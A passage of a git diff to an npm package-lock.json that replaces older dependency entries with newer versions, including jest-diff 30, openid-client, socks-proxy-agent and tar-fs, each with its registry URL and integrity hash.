"sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==", "dev": true }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", + "ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", "dev": true, "requires": { - "find-up": "^4.0.0" + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" + }, + "dependencies": { + "sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", + "dev": true + } } }, - "pretty-format": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.4.1.tgz", - "integrity": "sha512-dt/Z761JUVsrIKaY215o1xQJBGlSmTx/h4cSqXqjHLnU1+Kt+mavVE7UgqJJO5ukx5HjSswHfmXz4LjS2oIJfg==", + "is-number": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", + "dev": true + }, + "isomorphic-ws": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", + "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", + "dev": true, + "requires": {} + }, + "jest-diff": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-30.0.4.tgz", + "integrity": "sha512-TSjceIf6797jyd+R64NXqicttROD+Qf98fex7CowmlSn7f8+En0da1Dglwr1AXxDtVizoxXYZBlUQwNhoOXkNw==", "dev": true, "requires": { - "@jest/schemas": "^29.4.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" + "@jest/diff-sequences": "30.0.1", + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "pretty-format": "30.0.2" }, "dependencies": { + "@jest/schemas": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-30.0.1.tgz", + "integrity": "sha512-+g/1TKjFuGrf1Hh0QPCv0gISwBxJ+MQSNXmG9zjHy7BmFhtoJ9fdNhWJp3qUKRi93AOZHXtdxZgJ1vAtz6z65w==", + "dev": true, + "requires": { + "@sinclair/typebox": "^0.34.0" + } + }, + "@sinclair/typebox": { + "version": "0.34.37", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.34.37.tgz", + "integrity": "sha512-2TRuQVgQYfy+EzHRTIvkhv2ADEouJ2xNS/Vq+W5EuuewBdOrvATvljZTxHWZSTYr2sTjTHpGvucaGAt67S2akw==", + "dev": true + }, "ansi-styles": { "version": "5.2.0", "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", "dev": true + }, + "pretty-format": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-30.0.2.tgz", + "integrity": "sha512-yC5/EBSOrTtqhCKfLHqoUIAXVRZnukHPwWBJWR7h84Q3Be1DRQZLncwcfLoPA5RPQ65qfiCMqgYwdUuQ//eVpg==", + "dev": true, + "requires": { + "@jest/schemas": "30.0.1", + "ansi-styles": "^5.2.0", + "react-is": "^18.3.1" + } } } }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, + "jest-regex-util": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-30.0.1.tgz", + "integrity": "sha512-jHEQgBXAgc+Gh4g0p3bCevgRCVRkB4VB70zhoAE48gxeSr1hfUOsM/C2WoJgVL7Eyg//hudYENbm3Ne+/dRVVA==", + "dev": true + }, + "jose": { + "version": "6.0.11", + "resolved": "https://registry.npmjs.org/jose/-/jose-6.0.11.tgz", + "integrity": "sha512-QxG7EaliDARm1O1S8BGakqncGT9s25bKL1WSf6/oa17Tkqwi8D2ZNglqCF+DsYF88/rV66Q/Q2mFAy697E1DUg==", + "dev": true + }, + "js-tokens": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", + "dev": true + }, + "js-yaml": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", + "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" + "argparse": "^2.0.1" } }, - "proxy-from-env": { + "jsbn": { "version": "1.1.0", - "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", - "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "dev": true }, - "psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==" + "jsep": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", + "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", + "dev": true }, - "punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==" + "jsonpath-plus": { + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", + "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", + "dev": true, + "requires": { + "@jsep-plugin/assignment": "^1.3.0", + "@jsep-plugin/regex": "^1.0.4", + "jsep": "^1.4.0" + } }, - "qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" + "lodash-es": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==" }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", + "math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", "dev": true }, - "request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", + "micromatch": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", + "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", + "dev": true, "requires": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" + "braces": "^3.0.3", + "picomatch": "^2.3.1" }, "dependencies": { - "form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } + "picomatch": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", + "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", + "dev": true } } }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", + "mime-db": { + "version": "1.49.0", + "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", + "integrity": "sha512-CIc8j9URtOVApSFCQIF+VBkX1RwXp/oMMOrqdyXSBXq5RWNEsRfyj1kiRnQgmNXmHxPoFIxOroKA3zcU9P+nAA==", "dev": true }, - "resolve": { - "version": "1.20.0", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.20.0.tgz", - "integrity": "sha512-wENBPt4ySzg4ybFQW2TT1zMQucPK95HSh/nq2CFTZVOGut2+pQvSsgtda4d26YrYcr067wjbmzOG8byDPBX63A==", + "mime-types": { + "version": "2.1.32", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.32.tgz", + "integrity": "sha512-hJGaVS4G4c9TSMYh2n6SQAGrC4RnfU+daP8G7cSCmaqNjiOoUY0VHCMS42pxnQmVF1GWwFhbHWn3RIxCqTmZ9A==", "dev": true, "requires": { - "is-core-module": "^2.2.0", - "path-parse": "^1.0.6" + "mime-db": "1.49.0" } }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", + "ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", + "dev": true + }, + "node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", "dev": true, "requires": { - "resolve-from": "^5.0.0" + "whatwg-url": "^5.0.0" } }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true + "nodemailer": { + "version": "6.10.1", + "resolved": "https://registry.npmjs.org/nodemailer/-/nodemailer-6.10.1.tgz", + "integrity": "sha512-Z+iLaBGVaSjbIzQ4pX6XV41HrooLsQ10ZWPUehGmuantvzWoDVBnmsdUcOIDM1t+yPor5pDhVlDESgOMEGxhHA==" }, - "resolve.exports": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.0.tgz", - "integrity": "sha512-6K/gDlqgQscOlg9fSRpWstA8sYe8rbELsSTNpx+3kTrsVCzvSl0zIvRErM7fdl9ERWDsKnrLnwB+Ne89918XOg==", - "dev": true + "nunjucks": { + "version": "3.2.4", + "resolved": "https://registry.npmjs.org/nunjucks/-/nunjucks-3.2.4.tgz", + "integrity": "sha512-26XRV6BhkgK0VOxfbU5cQI+ICFUtMLixv1noZn1tGU38kQH5A5nmmbk/O45xdyBhD1esk47nKrY0mvQpZIhRjQ==", + "requires": { + "a-sync-waterfall": "^1.0.0", + "asap": "^2.0.3", + "commander": "^5.1.0" + } }, - "rfc4648": { - "version": "1.5.0", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", - "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==" + "oauth4webapi": { + "version": "3.5.5", + "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.5.5.tgz", + "integrity": "sha512-1K88D2GiAydGblHo39NBro5TebGXa+7tYoyIbxvqv3+haDDry7CBE1eSYuNbOSsYCCU6y0gdynVZAkm4YPw4hg==", + "dev": true }, - "rimraf": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", - "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", + "once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", + "dev": true, "requires": { - "glob": "^7.1.3" + "wrappy": "1" } }, - "safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" - }, - "safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" + "openid-client": { + "version": "6.6.2", + "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.6.2.tgz", + "integrity": "sha512-Xya5TNMnnZuTM6DbHdB4q0S3ig2NTAELnii/ASie1xDEr8iiB8zZbO871OWBdrw++sd3hW6bqWjgcmSy1RTWHA==", + "dev": true, + "requires": { + "jose": "^6.0.11", + "oauth4webapi": "^3.5.4" + } }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "picocolors": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", "dev": true }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "pump": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", + "integrity": "sha512-todwxLMY7/heScKmntwQG8CXVkWUOdYxIvY2s0VWAAMh/nd8SoYiRaKjlr7+iCs984f2P8zvrfWcDDYVb73NfA==", "dev": true, "requires": { - "shebang-regex": "^3.0.0" + "end-of-stream": "^1.1.0", + "once": "^1.3.1" } }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", + "react-is": { + "version": "18.3.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", + "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", "dev": true }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", + "rfc4648": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", + "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==", "dev": true }, "slash": { @@ -8833,42 +3169,31 @@ "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", "dev": true }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", + "smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==", "dev": true }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", + "socks": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", "dev": true, "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" } }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha1-BOaSb2YolTVPPdAVIDYzuFcpfiw=", - "dev": true - }, - "sshpk": { - "version": "1.16.1", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.16.1.tgz", - "integrity": "sha512-HXXqVUq7+pcKeLqqZj6mHFUMvXtOJt1uoUx09pFW6011inTMxqI8BA8PM95myrIyyKwdnzjdFjLiE6KBPVtJIg==", + "socks-proxy-agent": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", + "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", + "dev": true, "requires": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" + "agent-base": "^7.1.2", + "debug": "^4.3.4", + "socks": "^2.8.3" } }, "stack-utils": { @@ -8883,56 +3208,20 @@ "stream-buffers": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==" - }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } + "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", + "dev": true }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "streamx": { + "version": "2.22.1", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", + "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", "dev": true, "requires": { - "ansi-regex": "^5.0.1" + "bare-events": "^2.2.0", + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" } }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, "supports-color": { "version": "7.2.0", "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", @@ -8942,65 +3231,38 @@ "has-flag": "^4.0.0" } }, - "tar": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", - "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", - "requires": { - "chownr": "^2.0.0", - "fs-minipass": "^2.0.0", - "minipass": "^5.0.0", - "minizlib": "^2.1.1", - "mkdirp": "^1.0.3", - "yallist": "^4.0.0" - }, - "dependencies": { - "minipass": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", - "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==" - } - } - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", + "tar-fs": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.1.0.tgz", + "integrity": "sha512-5Mty5y/sOF1YWj1J6GiBodjlDc05CUR8PKXrsnFAiSG0xA+GHeWLovaZPYUDXkH/1iKRf2+M5+OrRgzC7O9b7w==", "dev": true, "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0", + "pump": "^3.0.0", + "tar-stream": "^3.1.5" } }, - "tmp": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/tmp/-/tmp-0.2.1.tgz", - "integrity": "sha512-76SUhtfqR2Ijn+xllcI5P1oyannHNHByD80W1q447gU3mp9G9PSpGdWmjUOHRDPiHYacIk66W7ubDTuPF3BEtQ==", + "tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", + "dev": true, "requires": { - "rimraf": "^3.0.0" + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" } }, - "tmp-promise": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/tmp-promise/-/tmp-promise-3.0.2.tgz", - "integrity": "sha512-OyCLAKU1HzBjL6Ev3gxUeraJNlbNingmi8IrHHEsYH8LTmEuhvYfqvhn2F/je+mjf4N58UmZ96OMEy1JanSCpA==", + "text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": 